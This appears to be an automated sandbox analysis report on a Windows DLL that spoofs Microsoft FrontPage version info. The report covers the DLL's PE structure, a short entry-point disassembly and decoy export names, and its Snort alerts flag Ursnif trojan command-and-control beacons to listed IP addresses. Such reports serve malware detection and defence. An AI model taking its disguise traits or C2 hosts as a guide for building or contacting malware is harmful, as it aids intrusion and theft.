                                                Preview: ...................................FL..................F.@.. .....@.>.......q.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q\u..PROGRA~1..t......L.*S......E...............J......~..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.*S................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J*S.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............3.......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T1UFLKKG48FA3WUXMTGA.temp
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5149
                                                Entropy (8bit):3.183838794552799
                                                Encrypted:false
                                                SSDEEP:48:bmdirPaI0IC9GrIoUAsASFimdirPaI0Ih683GrIoUAczbmdirPaI0Ix9GrIoUAVt:bpPaj99S0AJNpPaj+3S0A4pPaj29S0Af
                                                MD5:05FC1A57B94BA22548443982E7F842C3
                                                SHA1:0DDD60F8A850B26E9609B08E28A73E1B53F737E6
                                                SHA-256:F70317B844638C9C537B0BBCBA5C313B17C0645E43D1E926EA42CED71C5FDD22
                                                SHA-512:DE7F1031210F70FE1AF17C64F59D9FD88F32935FBA865389E2F087E0824A19145EE42E50C3817FA97BE1823C492CBCA23C7F82B4C7EEBF3A7C6CC36C4FFE7FEC
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ...................................FL..................F.@.. .....@.>.......q.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q\u..PROGRA~1..t......L.*S......E...............J......~..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.*S................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J*S.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............3.......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZYSNPJN96UYJD4Q50U0S.temp
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5149
                                                Entropy (8bit):3.183838794552799
                                                Encrypted:false
                                                SSDEEP:48:bmdirPaI0IC9GrIoUAsASFimdirPaI0Ih683GrIoUAczbmdirPaI0Ix9GrIoUAVt:bpPaj99S0AJNpPaj+3S0A4pPaj29S0Af
                                                MD5:05FC1A57B94BA22548443982E7F842C3
                                                SHA1:0DDD60F8A850B26E9609B08E28A73E1B53F737E6
                                                SHA-256:F70317B844638C9C537B0BBCBA5C313B17C0645E43D1E926EA42CED71C5FDD22
                                                SHA-512:DE7F1031210F70FE1AF17C64F59D9FD88F32935FBA865389E2F087E0824A19145EE42E50C3817FA97BE1823C492CBCA23C7F82B4C7EEBF3A7C6CC36C4FFE7FEC
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ...................................FL..................F.@.. .....@.>.......q.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q\u..PROGRA~1..t......L.*S......E...............J......~..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.*S................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J*S.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]............3.......C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

                                                Static File Info

                                                General

                                                File type:MS-DOS executable, MZ for MS-DOS
                                                Entropy (8bit):5.998813093039927
                                                TrID:
                                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                • Generic Win/DOS Executable (2004/3) 0.20%
                                                • DOS Executable Generic (2002/1) 0.20%
                                                • VXD Driver (31/22) 0.00%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:qT9Qk5aKTk.dll
                                                File size:243712
                                                MD5:58d9e2906f42336e9bee1137b4cf5839
                                                SHA1:7f29e42f6d317d7b11ad164a672e91e4515b5bc0
                                                SHA256:a9a0db068a2ed9c7b9b3cdbe7f3c1c82a6f9d2c1c7d4b820820927da004b6cbf
                                                SHA512:29feb57c0eaf537007a405c30975661f6e0608d46b78344f9de1c824612b8a396dad1abf00207ac7e76f83b04f4f62aae1b290ef6cc1196a83b5cea24772bec7
                                                SSDEEP:6144:tz3raG3DJCO3wVhIZhzG7WS7l8jE0DjSBj1:tDt4OtRZS7d
                                                File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g.P`...........!................b........@....@........................................................................

                                                File Icon

                                                Icon Hash:aca1b2a9bab29200

                                                Static PE Info

                                                General

                                                Entrypoint:0x40bb62
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                DLL Characteristics:
                                                Time Stamp:0x60500767 [Tue Mar 16 01:18:31 2021 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34df13d9f12a151ff03a5b61c12591c

                                                Entrypoint Preview

                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 24h
                                                push esi
                                                call dword ptr [004360A4h]
                                                mov dword ptr [ebp-14h], eax
                                                mov dword ptr [ebp-18h], eax
                                                push 0000001Dh
                                                push 004387C8h
                                                push 0043E7F0h
                                                push 00000001h
                                                call dword ptr [004360ECh]
                                                mov dword ptr [ebp-18h], eax
                                                cmp eax, 00000000h
                                                jne 00007F8F50C8A0F6h
                                                mov dword ptr [ebp-10h], eax
                                                push 00000015h
                                                push 0000003Dh
                                                push dword ptr [00453FF8h]
                                                call 00007F8F50C95541h
                                                lea esi, dword ptr [00453E24h]
                                                xor esi, 068C2815h
                                                sub esi, 55h
                                                xor esi, dword ptr [00453F34h]
                                                sub esi, esi
                                                mov dword ptr [00453E24h], esi
                                                push 0000001Dh
                                                push 004387C8h
                                                push 0043E7F0h
                                                push 00000001h
                                                call dword ptr [004360ECh]
                                                mov dword ptr [00453E24h], eax
                                                cmp eax, 00000000h
                                                jne 00007F8F50C8A137h
                                                jmp 00007F8F50C89685h
                                                pop ecx
                                                pop ebp
                                                push 0000001Dh
                                                push 004387C8h
                                                push 0043E7F0h
                                                push 00000001h
                                                call dword ptr [004360ECh]
                                                mov dword ptr [ebp-0Ch], eax
                                                cmp eax, 00000000h
                                                jne 00007F8F50C89FFEh
                                                mov dword ptr [0043C210h], eax
                                                push 0000001Dh
                                                push 004387C8h
                                                push 0043E7F0h
                                                push 00000001h
                                                call dword ptr [004360ECh]
                                                cmp eax, 00000000h

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0xf9130x610.text
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3a3bc0x78.data
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x5f0000xa9b4.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x6a0000x2198.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x360000xf4.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000xfa150xfc00False0.502294146825data6.16505277896IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                0x110000x820x200False0.263671875data1.90933265931IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                0x120000xbe0x200False0.36328125data2.50841842788IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                0x130000xdb0x200False0.392578125data2.84165337483IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                0x140000xaa890x200False0.400390625data2.8122785819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                0x1f0000xed0x200False0.427734375data2.99218036913IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                0x200000xaa6c0x200False0.357421875data2.55234629154IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                0x2b0000xaaa80x200False0.423828125data2.88109872148IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rdata0x360000xf40x200False0.28515625data2.29418780158IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x370000x279ba0x1d000False0.527899380388data5.29515323456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .rsrc0x5f0000xa9b40xaa00False0.405078125data5.36948542132IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x6a0000x21980x2200False0.801470588235data6.81021842164IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x5f3880x2e8dataEnglishUnited States
                                                RT_ICON0x5f6700x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                RT_ICON0x5f7980x1628dBase IV DBT of \200.DBF, blocks size 0, block length 4608, next free block index 40, next free block 791621542, next used block 2795544736EnglishUnited States
                                                RT_ICON0x60dc00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                RT_ICON0x612280x988dataEnglishUnited States
                                                RT_ICON0x61bb00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                RT_ICON0x62c580x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                RT_ICON0x652000x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                RT_GROUP_ICON0x694280x14dataEnglishUnited States
                                                RT_GROUP_ICON0x6943c0x14dataEnglishUnited States
                                                RT_GROUP_ICON0x694500x14dataEnglishUnited States
                                                RT_GROUP_ICON0x694640x14dataEnglishUnited States
                                                RT_GROUP_ICON0x694780x14dataEnglishUnited States
                                                RT_GROUP_ICON0x6948c0x14dataEnglishUnited States
                                                RT_GROUP_ICON0x694a00x14dataEnglishUnited States
                                                RT_GROUP_ICON0x694b40x14dataEnglishUnited States
                                                RT_VERSION0x694c80x4ecdataEnglishUnited States

                                                Imports

                                                DLLImport
                                                advapi32.dllDeregisterEventSource, ReportEventW, RegCloseKey, RegisterEventSourceW, RegOpenKeyExW
                                                dssenh.dllCPVerifySignature
                                                kernel32.dllVirtualProtectEx, FindFirstFileExW, EnterCriticalSection, TlsAlloc, LCMapStringW, GetTempPathW, GetFullPathNameW, QueryPerformanceCounter, TlsSetValue, MultiByteToWideChar, SetLastError, IsProcessorFeaturePresent, GetFileAttributesExW, WideCharToMultiByte, LeaveCriticalSection, OutputDebugStringW, GetModuleHandleExW, RaiseException, GetStringTypeW, LoadLibraryExW, RemoveDirectoryW, IsWow64Process, DeleteCriticalSection, GetProcAddress, InitializeCriticalSection, SetUnhandledExceptionFilter, TlsFree, Sleep, GetModuleFileNameW, IsDebuggerPresent, LoadLibraryA, GetCurrentProcess, GetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, GetModuleHandleW, RtlUnwind, InitializeSListHead, FindNextFileW, GetEnvironmentVariableW, SwitchToThread, CreateDirectoryW, FreeLibrary, FindClose, GetCurrentProcessId
                                                shell32.dllShellExecuteW
                                                user32.dllMessageBoxW

                                                Exports

                                                NameOrdinalAddress
                                                Aquatically10x401d64
                                                Episodically20x401f9b
                                                Kakapo30x402686
                                                Overdistantness40x4026c9
                                                Pseudopodal50x4027af
                                                Microphage60x4029d4
                                                Cytost70x402dd1
                                                Reattach80x402f9a
                                                Vigia90x4037fe
                                                Preallable100x403ac1
                                                Amphistomous110x403d01
                                                DllRegisterServer120x403f1f
                                                Americanistic130x404150
                                                Suprahumanity140x40454c
                                                Eupyrchroite150x404698
                                                Splitbeak160x404e58
                                                Andirin170x405002
                                                Drail180x4050c1
                                                Exequatur190x405267
                                                Meith200x405a59
                                                Undergrow210x4063bb
                                                Teaseableness220x4064de
                                                Joggler230x406589
                                                Swahilese240x4066c8
                                                Myelinated250x40676a
                                                Pyroxenic260x406af1
                                                Godspeed270x40710b
                                                Vigor280x407189
                                                Premedieval290x4078e3
                                                Papalizer300x40797c
                                                Coiled310x407a15
                                                Tarentala320x408120
                                                Hopbush330x40887a
                                                Bischofite340x40894f
                                                Everliving350x408ab4
                                                Mucigen360x408dc6
                                                Cigarito370x4090a9
                                                Cabree380x4091df
                                                DllUnregisterServer390x409499
                                                Unprovidenced400x4097e9
                                                Arosaguntacook410x409880
                                                Lysimeter420x40a518
                                                Nonchokebore430x40aca7
                                                Eccaleobion440x40af98
                                                Gelatinously450x40b1ad
                                                Tlapallan460x40b3aa
                                                Amphicyrtic470x40b770
                                                Alpinesque480x40b825
                                                Spermatocyst490x40b8d4
                                                Pseudostomous500x40b979
                                                Misogynism510x40bb62
                                                Delsarte520x40bca3
                                                Kobird530x40c0f8
                                                Dracocephalum540x40c4c7
                                                Goanese550x40c667
                                                Peltate560x40c9b9
                                                Sturiones570x40cb2d
                                                Meebos580x40cf4a
                                                Cardiameter590x40d35c
                                                Disguster600x40d620
                                                Monobromoacetone610x40d6cf
                                                Bacchanalize620x40d803
                                                Azeotropism630x40dbf1
                                                Holconoti640x40dc9d
                                                Microgametophyte650x40dfaf
                                                Crenated660x40e3e1
                                                Overgratefully670x40e482
                                                Prodramatic680x40e7ce
                                                Uncondensableness690x40ea33
                                                Disporous700x40eae2
                                                Trichophore710x40f00e
                                                Profluvium720x40f444
                                                Unreduceable730x40f4f2

                                                Version Infos

                                                DescriptionData
                                                LegalCopyrightCopyright 1995-1999 Microsoft Corporation, All rights reserved.
                                                FileVersion4.0.2.7523
                                                CompanyNameMicrosoft Corporation
                                                LegalTrademark1Microsoft, Windows, and FrontPage are registered trademarks of Microsoft Corporation, and WebBot is a trademark of Microsoft Corporation, in the United States and/or other countries.
                                                ProductNameMicrosoft FrontPage 2000
                                                ProductVersion4.0.2.7523
                                                FileDescriptionMicrosoft FrontPage Server Extensions
                                                OriginalFilenameRPCTEST.DLL
                                                Translation0x0409 0x04b0

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                09/10/21-11:12:31.213751TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4982480192.168.2.713.225.29.191
                                                09/10/21-11:13:13.069914TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4988780192.168.2.713.225.29.191
                                                09/10/21-11:13:13.069914TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4988780192.168.2.713.225.29.191
                                                09/10/21-11:13:28.241213TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4982480192.168.2.713.225.29.191
                                                09/10/21-11:13:39.121591TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4993580192.168.2.713.225.29.204
                                                09/10/21-11:13:39.121591TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4993580192.168.2.713.225.29.204
                                                09/10/21-11:13:53.557957TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4993880192.168.2.713.225.29.191

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 10, 2021 11:28:19.840903997 CEST49767443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.840958118 CEST44349767104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.841062069 CEST49767443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.841764927 CEST49768443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.841793060 CEST44349768104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.841846943 CEST49768443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.842763901 CEST49767443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.842793941 CEST44349767104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.842941046 CEST49768443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.842956066 CEST44349768104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.885902882 CEST44349768104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.885997057 CEST49768443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.886013031 CEST44349767104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.886089087 CEST49767443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.891499996 CEST49768443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.891515970 CEST44349768104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.891838074 CEST49767443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.891863108 CEST44349767104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.891932011 CEST49768443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.891941071 CEST44349768104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.891969919 CEST44349768104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.892020941 CEST49768443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.892199993 CEST44349767104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.892251968 CEST49767443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.943165064 CEST44349768104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.943229914 CEST49768443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.943244934 CEST44349768104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.943290949 CEST49768443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.944987059 CEST49768443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:19.947670937 CEST44349768104.20.185.68192.168.2.5
                                                Sep 10, 2021 11:28:19.947748899 CEST49768443192.168.2.5104.20.185.68
                                                Sep 10, 2021 11:28:20.161031961 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.161068916 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.161149025 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.161221027 CEST44349783104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.161271095 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.161757946 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.162544012 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.162564993 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.189171076 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.189189911 CEST44349783104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.207179070 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.207247019 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.212363005 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.212379932 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.212626934 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.212626934 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.212681055 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.227986097 CEST44349783104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.228068113 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245215893 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245265961 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245290995 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245300055 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245304108 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245312929 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245362997 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245369911 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245374918 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245384932 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245424032 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245434999 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245464087 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245476007 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245481968 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245506048 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245534897 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.245748997 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.245799065 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.257302046 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.257323980 CEST44349783104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.257508993 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.257618904 CEST44349782104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.257678986 CEST49782443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:20.257776022 CEST44349783104.26.7.139192.168.2.5
                                                Sep 10, 2021 11:28:20.257855892 CEST49783443192.168.2.5104.26.7.139
                                                Sep 10, 2021 11:28:24.599733114 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.599767923 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.599860907 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.601958990 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.601990938 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.602061033 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602133989 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602180004 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.602222919 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602246046 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602251053 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.602318048 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602407932 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602428913 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.602484941 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602840900 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.602864981 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.603053093 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.605899096 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.605923891 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.632415056 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.632425070 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.632442951 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.632457972 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.632488012 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.632510900 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.632536888 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.632563114 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.656590939 CEST49821443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.656625032 CEST44349821151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.658821106 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.658917904 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.665678024 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.665690899 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.665970087 CEST44349816151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.666028023 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.666134119 CEST49816443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.677709103 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.677810907 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.678397894 CEST44349817151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.678419113 CEST44349818151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.678518057 CEST49817443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.679182053 CEST49818443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.683211088 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.683238983 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.683475971 CEST44349819151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.683540106 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.683655977 CEST49819443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.689750910 CEST44349820151.101.1.44192.168.2.5
                                                Sep 10, 2021 11:28:24.689881086 CEST49820443192.168.2.5151.101.1.44
                                                Sep 10, 2021 11:28:24.695409060 CEST49820443192.168.2.5151.101.1.44
